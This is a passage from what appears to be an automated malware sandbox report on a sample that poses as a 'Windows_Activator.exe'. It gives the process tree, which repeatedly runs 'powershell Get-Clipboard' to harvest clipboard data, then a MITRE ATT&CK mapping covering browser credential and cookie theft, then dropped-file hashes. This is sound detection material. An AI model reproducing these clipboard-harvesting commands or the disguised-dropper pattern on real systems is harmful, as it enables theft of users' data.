C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:2416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:4460 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:2128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:4696 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:5476
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:5224 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:5480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:3292 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:1036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:4932
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:2052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:4888 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:5464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:900
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:4360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:5688
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:1612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:2028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:6120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:3456 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:5312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:5280 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:5388 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:5492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:2376 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:5532
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:5424 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:5992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:5996
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:5852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:2520
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:3840
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:4572 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:2968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:6084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:3572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:2120
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:2964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:2980
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:5108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:3536
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:3648
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:4812
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:2948
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:1660 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:5632
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:1220 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:2820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:5612 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:2616
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:316 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:4124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:5236 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:2356
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:396 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:980 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:1996
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:5344
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:5760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:2252 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:2100 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:5460
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:4416 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:1916
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:3028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:4764 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:3152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:3048 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:4748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:2876
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:5008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:1008 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:5756
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:1572
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:2376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵PID:5768
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:5992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:5124 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:5852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:4772 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:6080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:5336 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵PID:1180
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:4392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:5268
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:3592 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:4960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:5936 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:2768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:5452 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
PID:5960
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:5468
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:5196
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3024
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:4540
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Windows_Activator.exe1⤵PID:1408
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Windows_Activator.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Windows_Activator.exe2⤵
- Executes dropped EXE
PID:420
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Windows_Activator.exe1⤵PID:5776
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Windows_Activator.exeC:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Windows_Activator.exe2⤵
- Executes dropped EXE
PID:5520
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
2Installer Packages
1Netsh Helper DLL
1Modify Authentication Process
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Access Token Manipulation
1Create Process with Token
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
2Installer Packages
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Access Token Manipulation
1Create Process with Token
1Direct Volume Access
1Indicator Removal
2File Deletion
2Modify Authentication Process
1Modify Registry
2System Binary Proxy Execution
1Msiexec
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
55KB
MD54b96e4a5f06cdf33357719cec2538818
SHA10920b7549ec20505e881ec1f4799482ef5797dfc
SHA25652b433476eec754fc77ee42e04497e2ce11a73aea0ddae820507601d37a2e5cf
SHA51205a01f21994ada415d9f22245bc59408c8ce6a4583bf39d5c0d0ff9aae684a7fafcf4714e8a7b1afdb5c64d21d547b9ce905706445b3aee7a2f2e10fd6b10431
-
Filesize
78KB
MD52b67e47cb8da1058770fe41d8b947619
SHA19eb259b1d377a24a2b77a694cf31c23cef7b8eef
SHA25646f616820751849512d2704ddb604666170d13315c4383b8c8611c3e1c2f594a
SHA51227c0593d662df228e146c49af6da52e39523523af924cf95ba4890b1b42358b2b8df3cf2667d8f672eece4f7fe098574c4689677768dd54d3b872619c7b9ae55
-
Filesize
61KB
MD5271847949971c396f77beaab936b7ea2
SHA1b32c5a7eec49aa07f8ae73feb990626010c4b850
SHA256a55224cdf06a5c2b937ba400604501f8b6ec93bc2c1cff62aa2fd378d504c657
SHA512a2e141f68143f370e2b82a1c9c7c4b1c5f6fc2cfc2ad94acb8c5c02237af56f83904beaff3240e20397f0edbdfadf8779c0bd54b2cf0c9899fef59343e31794a
-
Filesize
2KB
MD5192e90432fed0081abb25295d8f309c4
SHA15150e93061f39e26688afd60a04c0ab14b510d47
SHA2563216d6864b4f8824b82eb887edf95436dac3bea3f7d43d8988a176e3f1f8e1b2
SHA5129b9b3f85eb9f12ad1b4c8cfc5e672758d879e178179deb28e80e6c3b27871261bf6b52f9066850b5a7a2fd85012b5308eaf3dda882fa40febc9cf6b47f1a4f04
-
Filesize
10KB
MD59f74f11972c3c0b161832ffab541bf31
SHA1e5841ba20a229cdeab85d30690509e649e848271
SHA2568b74a0abdd566ffdf15891d6abd3537bffb0abce7f362c737c3de6752e136032
SHA512b90f13eb65a4dcfdd596a7d9eba7c1ba5eb1a598e51107ce3dca07c0a0025469ab18c9958eff2b36f7e05a23f0d16d7d9d7c2321b8e1f2a456aaa7bec3ced0e8
-
Filesize
87KB
MD59ac39dc31635a363e377eda0f6fbe03f
SHA129fa5ad995e9ec866ece1d3d0b698fc556580eee
SHA2569a2723c21fb1b7dff0e2aa5dc6be24a9670220a17ae21f70fdbc602d1f8acd38
SHA5120799ae01799707b444fca518c3af9b91fda40d0a2c114e84bc52bd1f756b5e0d60f6fd239f04bd4d5bc37b6cdbf02d299185cd62410f2a514a7b3bd4d60b49fc
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
80KB
MD51b1000b183058a0849ab19662c43b0f1
SHA159b8aac17a28359681852efffe61ebc55270d7fa
SHA25671eded359fafa8ae97adcee8608b82cc9ee8f0a709a25038410b55d635b1bad0
SHA5129ec4b783653ecf931933d818973bcbca7c67a98c14191ddc2ee2858fd33e70a6e413e3efc07f8966d55a597b50c18db6580f6ff35b67f74e154f9369b80fd170
-
Filesize
3KB
MD5aa67313df8310c9dd658c44d965d923a
SHA1a8a2a462eab0df4d117324bcf5475d191f5bdf49
SHA2565c861e50cfcbc30a28761ab944a53674e22a59c18e68b074afaf03d4fbe711f9
SHA51266696c889f5b0803ce1121af5acb24fb4c4638176acddf3939dc221f372800222596f593ff09a931c5411dc2c6637d8ea1322d0fa05e11195d078e547d19df91
-
Filesize
16KB
MD53406d3b708dcef0116bffd8eaa181ad4
SHA13df64b48bff2b9d4160d900e91a7670046a24340
SHA256fde3b41a5711362d7f3df7d71563d5eb6cc679bae7f80f74afcdf81dbc09eafd
SHA512d22d05c221bd19bc3b07e9a5ed722fbf8fbf75d695302fe8ec441d6d1e653bd63b3751a9608b344cc859feb79c5869aaeedd08bf846dc01a522b3a0dbb1637d9
-
Filesize
280B
MD529f13140c50c2394177caf96baf3a5c0
SHA1680e35060382a846752eb208b62de077d31fd1eb
SHA256f4554eb3e1e133edb5f5f01e19539ffc52adc0b346e19c4742a815e7a92b2dcb
SHA512d964d066a2913d3b6eb73925160d7e9d79a94ae5c6e3956cd361b54fe53833b311990a91346917bc90b227301d864939f6a5a417ff52ef9fe8e21971b1a661fc
-
Filesize
280B
MD5a46a324553367dc0b13a007305e4f102
SHA1005a700ac0bf4429024f9e857e2281f82f370aed
SHA256a718f2fe90be4422382450b4959840a13d6d18dea09d3da5394624198a126063
SHA512d3b9fcde15be13451aa441070d9143fc53faa6a2725adea7fb9c340bcb9d7ea183dc1b36c0f8ec21c1748c80bc8fa03a14f198c2fc914c9f8e81702bd8e18399
-
Filesize
69KB
MD5164a788f50529fc93a6077e50675c617
SHA1c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48
SHA256b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17
SHA512ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\content.js
Filesize9KB
MD53d20584f7f6c8eac79e17cca4207fb79
SHA13c16dcc27ae52431c8cdd92fbaab0341524d3092
SHA2560d40a5153cb66b5bde64906ca3ae750494098f68ad0b4d091256939eea243643
SHA512315d1b4cc2e70c72d7eb7d51e0f304f6e64ac13ae301fd2e46d585243a6c936b2ad35a0964745d291ae9b317c316a29760b9b9782c88cc6a68599db531f87d59
-
Filesize
107KB
MD540e2018187b61af5be8caf035fb72882
SHA172a0b7bcb454b6b727bf90da35879b3e9a70621e
SHA256b3efd9d75856016510dd0bdb5e22359925cee7f2056b3cde6411c55ae8ae8ee5
SHA512a21b8f3f7d646909d6aed605ad5823269f52fda1255aa9bb4d4643e165a7b11935572bf9e0a6a324874f99c20a6f3b6d1e457c7ccd30adcac83c15febc063d12
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\4ad0fc24-14c3-4a53-bdc8-24ae321a49ae\index-dir\the-real-index
Filesize528B
MD55bcfbbbc107e968d59ab692c4329871c
SHA1deb4422b0252834e0d9c8014a679c14fec1f7df4
SHA2561899ffed7ac69bfc204682a1acd47e5c97fed43e74937426fb8dde5ccceb35ac
SHA5129e529a14a46e98450c33832199b0a794ff5082d615668e1964318e5966998ed4920e9c93447848633c38fb9afb94719f6b57af1389704f9a27a4678c25d3d7b4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\4ad0fc24-14c3-4a53-bdc8-24ae321a49ae\index-dir\the-real-index~RFe587e91.TMP
Filesize528B
MD583a8b081bd37c1acc642187f1c4c7db0
SHA105879295913fa81109ed744a44813a3cebad98c1
SHA256d098b1214076c6e2f66514091342bf870305614f40572fd3b77a02a6c05c17fc
SHA51290ae0996622b9b9eed0337304a160f32cffafdf767a2bd8947f54086c64f90fa27c524933793363c0f1cbb0794f6fe85abc93e0219421b603ccc250c29cdaa34
-
Filesize
6KB
MD515c651292a079a7401201fc434758988
SHA179a29b453ecc529a6f9a0719dd55ab713036fff0
SHA256bb334660847d9eb10e29f4cca3c5f3ac3faf4c9a605f8a4df4ce68cbaa17c279
SHA512f16b4b974d15f35201ae9601dc76281d6ba4da502c04801512c4841439d5238abe03b78d1b3bcda30108d2fe0d1e71b597e2ac22e09b69e1ece9dbfdb8bd5d6e
-
Filesize
7KB
MD59707a33040ff0b47bdd77f3444a3e813
SHA15fe72efd565d68349ff991f354b3f2e426a3dfc5
SHA2566f5d28cd6731c45d3bfc33e2253ea70f54ff355057c144bc02729e7a2a91ee99
SHA512443072dc3d307a57ea6f7d8d6b7c7a848350d5a89bb479e1346879e05eeab15de5b8a02ca09be667fe9b32bd9fb0332a9e76080f755d7d66ed5dd7ea477c8eb4
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
Filesize2KB
MD53013fb57f2352e2264c8475a2338bd99
SHA1a11e8e74d799a1997c0f97efadc16d377dd2b40f
SHA2565d41bacc7de46ffcb32a15b3b3eab0e9c3535f0fc57548d3ea4eef58887a485a
SHA51267bc23795d35dc563299145dd5d42cbb5c154f989bc83d6eb4b090785a391756776bd0d786a10000f4b3d9e71bd90f162fb37f3edd55959fe01e3ed2c0521315
-
Filesize
2KB
MD5432f9dde51413638aa680afc11009cee
SHA13a457e5820bae4e2e8f4c805e020e6431fd90fcd
SHA256882b1f9d2025c7bdd95f6bf95011745281f84b65326027b5ad7903e67cb5ca65
SHA512b3a7be48d871b29bc995bacd66d66cbc2def0723fe232f3b58826581954c30c95c8c235ab63d026b576294ca7ab45ccded9a6f35a7121f311f71c429cbf59549
-
Filesize
2KB
MD59908ad00c0d81613edc6d81867971ca7
SHA17c8a97954126ec2f200012a4fb270f5cea408103
SHA25685addde1ff0c019e3b5cb2a222f0fdff26c033aefaa8bac119749cdbd933161a
SHA512dd65af600a6731dc69b775f06088de4efcaa71c6346eb02cbee70136c917601e353b9b452890c08682354c8e47a03ba437cc45f820fb5c03af9f3a84f58e037e
-
Filesize
2KB
MD5b9883372990b8d2d6a2ccdd7785ac861
SHA1fa8efcbbfd4d48bec65cab35a4978f00f567066c
SHA2564d5404e0bc751f10d6042f1fa8e16f2ea51bbd8e0e7c92cc773ec15b0c6c5f7d
SHA51291dbcf24490c6421b352af7e31d44d9b70c6aac4c8fdbbf27fd34c549c0c6a6d58ec836a8d96bc0ad2b488a589307470d497af7b539ebf4eff317117c91868e0
-
Filesize
307B
MD55e4055804d4f18faee83fa90909d7856
SHA1cdbf796fe89bfbd44d86ecf9cb969fe31ac4c7e5
SHA25626de2bbb7ebdcd1f67b976501416d070c8fa4b5a38a9f50d53c849a7430054eb
SHA5126fcc95c936dac04b45374e141631f302f4a2a6a4a20660e37419fd56c506be1742d4834e3e3ade8a0fe633669380bc6d68867b2f4e3a3a5e761db41ba02c4ce0
-
Filesize
2KB
MD53fd76245f9c805a00991c24958070ea1
SHA129d4992831c5cafbb130d769bbeaeda62035ec35
SHA256be1225358f4708c1d781f3c6fc9b5c9134e08709806763895ff3b5bd506d9dc9
SHA51291057098fd598db749271b49dba246981f5dac9b8300b3d4bb55e49457f4dde641718934e863f28e670bd33d54fc31dccf0974c6e5daf97e89a71cec7f9e523a
-
Filesize
2KB
MD51fe3897632c3f96fb585a8da1a62f9f0
SHA1edf18f004e4416e0d91705fd5aebe7c025155e89
SHA2563d9c15048e62a0bc8360028a7fb88a100d5e37af89e41e91d61c750439f72f7e
SHA512ee47623d6039ed9b54e750dbed230753f6206dfefc2d628989416f26cc97b82e8fb41a75dfdb64b231d430b9b79fd8fbe7b1afd8e7c0f19a7ffcf749158123d6
-
Filesize
2KB
MD5e7d75950b2f0805cfbe5a47291a042d0
SHA1032965fa82f81d5fceceb3b9088a4f00c8186d45
SHA25666ed8eb036d605c9755c142c72327b90580985d871f60ad56b9fd6917e33beb5
SHA512bcfdf3d4b8511e0fe34cfd11e0f50f0f78682a543df31f77669b0adf16e094cde1385d5786df02c25dd76fe27ab2840b7491f59242db080332a6f73285ed5671
-
Filesize
2KB
MD56db758528ba9e90b626846b193a3a866
SHA16a5b014e3b88b4e7bb09297b21f97a0bba17484c
SHA25608e6f7e1737e51f74cf0a0556146951387864d1c854777ca0fbdd3ed63f8b40b
SHA5124316d6a9b64281c851e7af1ba44e1edb8969f94b4ad00771cc51b58f5460721db6e990ef39e15b5f535ba8757f51f55e3e897de4b924341d46355a390cf8b9fc
-
Filesize
2KB
MD59ac0753b1728f09c3070ab08dbead740
SHA127ceeceb104792c7200ca69fd87ad44381721783
SHA2560bc56afeb02644daa2e79776281eddc83ef116a20387b14adb3e3f5206e889c5
SHA512d8b2270eec13e1aa39801c72b853b8cc39e926ee68c276b682b7c74d103bb813e7be19cbd51d475e4894104753c108040c24a3e412304283e46800621149f01e
-
Filesize
2KB
MD5c9eaad522786c81d88649156a2c47d0c
SHA10446265c58a2f1ddec829ca04ab7465e6aa253bc
SHA256bd7651181648c9b7fbb0ce960e46c5fdb6fc0b40e3d6e0da1484213df0d3c2e5
SHA5123cc41a9d35f0dfdaa8012dd0280794a878f05436e1584e2ac96d25c5e0a82ffe1484d5b1f46cfcbf2f07e2a248c60a0320780dd8f5814dfa090fb043ad6522ec
-
Filesize
2KB
MD571ed5ccc6d09775e8abf022f8fee5488
SHA1fa488977efa8aee5a0c69822171882aced1149bf
SHA25647f69d658afde74cad223c2f204bbb4affcc499e0ebe1294e8ed965d2d3f4914
SHA51233a9d022a5491657310594c59a60a52eed19c89aa78a4a8ea8f9c6faa387df5f9474711be69be8f9db2d0b8adee3338a4bf9585b6a5bf5a8ee043bb4958c4074
-
Filesize
2KB
MD5d5d1fa631bb12681d65ba5988d104052
SHA1aa38b61ff83ca404b74b7852df945e8967bdc6ec
SHA2562e0a3833169deda4f9d6faf7283737eab1b746e24955df3991cff4e53c425dd0
SHA512c78da3e9e571f898f30df9668e92a10cf257d5437976c3a4126c547c10fdcf0c7a0ded9fe36cc5653b6fe45573a12108d32945517aa0cb72573dc13283a632ec
-
Filesize
2KB
MD56f6b0c4989b4be3b9614a07830910c21
SHA19e97c77968c5a868ab47b880457b018dfa47518d
SHA2566adcf90e81473b2b21c434351fdd203ba24c505c1eed6e5063b25880effd2402
SHA5125f3e397a9158efd24e60ddf1c4c2bf9fcc7b19698189c6ffa6df7b65dc9732bed4e76983199f73a61607c6cd382795819cdca6801c6430991ec69900cc9d5f95
-
Filesize
2KB
MD58cc3d73a18ec27ebf300640afd40f35e
SHA12372011a4d23b86524a0b5e6ba81d503392c08fb
SHA2566c0d3ac9eb03d4bfa6765a39458be0b21a036c29d0344ff6dd9c92fb8609c872
SHA512fdf567e045560dc5d95bec0c940a86a5dea9210ae42535765d0d46c030ae9001fe97bc80fec98e4e47a4c0c979032b28f670a9829050b7be2d9f4eafdfb563b8
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
